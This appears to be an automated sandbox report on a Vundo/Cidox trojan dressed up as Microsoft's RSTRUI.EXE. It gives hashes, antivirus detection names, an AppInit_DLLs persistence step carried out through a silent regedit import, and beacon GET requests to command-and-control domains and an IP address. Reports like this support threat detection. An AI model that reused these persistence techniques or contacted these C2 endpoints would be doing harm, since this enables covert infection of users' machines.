Analysis Date | 2014-10-31 16:14:12 |
---|---|
MD5 | 33a8f404432335d3564e071bf925ee1c |
SHA1 | ab93199b1576ece9b13efe2fb9a9cc8db555d76f |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: a9203a1cc01f9b0f484624acacfdc942 sha1: 6f41d4c06bd740cc857107a74c1592da3e5ccbf9 size: 91648 | |
Section | _ASM2 md5: 5cbdb671cc3cd9b028945704dfb18263 sha1: 2c7f4695add5826a76301516006fca2d6cf0a3f4 size: 63488 | |
Section | .rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192 | |
Section | .data md5: 1695711b55e0545e6ce1f490e5461ba9 sha1: 23a499463667bfda6e2f52b56f4fa651be33479f size: 5120 | |
Section | .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 | |
Section | .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304 | |
Timestamp | 2012-09-25 02:26:21 | |
Version | LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | ed7168502630d6f765608bf68788c6f93aa2bee5 | |
IMPhash | 11c52178b812c23b7febf02fc8e99619 | |
AV | 360 Safe | Gen:Variant.Kazy.211341 |
AV | Ad-Aware | Gen:Variant.Kazy.211341 |
AV | Alwil (avast) | Vundo-XF [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen7 |
AV | BullGuard | Gen:Variant.Kazy.211341 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | Win.Trojan.Cidox-121 |
AV | Dr. Web | Trojan.Mayachok.17986 |
AV | Emsisoft | Gen:Variant.Kazy.211341 |
AV | Eset (nod32) | Win32/Kryptik.AMFU |
AV | Fortinet | W32/Citirevo.AB!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Kazy.211341 |
AV | Grisoft (avg) | Generic_r.BGN |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | Backdoor ( 04c4f2bf1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.FakeMS.ED |
AV | Mcafee | Vundo-FASV!33A8F4044323 |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Kazy.211341 |
AV | Norman | Gen:Variant.Kazy.211341 |
AV | Rising | Trojan.Win32.Generic.1349AE9B |
AV | Sophos | Mal/Vundo-M |
AV | Symantec | Trojan.Zatvex!gen6 |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | Backdoor.Cidox |
Runtime Details:
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\dauaakj.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | denadb.com |
Winsock DNS | 91.220.35.154 |
Winsock DNS | terrans.su |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | denareclick.com |
Winsock DNS | fescheck.com |
Winsock DNS | instrango.com |
Winsock DNS | verzinla.com |
Winsock DNS | getintsu.com |
Winsock DNS | tegimode.com |
Winsock DNS | netrovad.com |
Winsock DNS | nshouse1.com |
Winsock DNS | veriolana.com |
Winsock DNS | inzavora.com |
Winsock DNS | odobvare.com |
Winsock DNS | foradns.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\dauaakj.dll\\x00 |
---|
Network Details:
DNS | getintsu.com Type: A 141.8.225.80 |
---|---|
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 141.8.225.80 |
DNS | fescheck.com Type: A 209.222.14.3 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | denadb.com Type: A 204.11.56.26 |
DNS | foradns.com Type: A 209.222.14.3 |
DNS | veriolana.com Type: A |
DNS | verzinla.com\032 Type: A |
DNS | instrango.com Type: A |
DNS | netrovad.com Type: A |
DNS | odobvare.com Type: A |
DNS | terrans.su Type: A |
DNS | tegimode.com Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU User-Agent: |
HTTP GET | http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUX3J49FLC6Zz User-Agent: |
HTTP GET | http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURz7+qiRh4pJ User-Agent: |
HTTP GET | http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURRF51nwD1/z User-Agent: |
HTTP GET | http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU User-Agent: |
HTTP GET | http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUeY4cMHbVW5i User-Agent: |
HTTP GET | http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUQ0bnSPKR2xz User-Agent: |
HTTP GET | http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUZy5Ea2PjIuA User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 204.11.56.26:80 |
Flows TCP | 192.168.1.1:1037 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1038 ➝ 91.220.35.154:80 |
Raw Pcap
Strings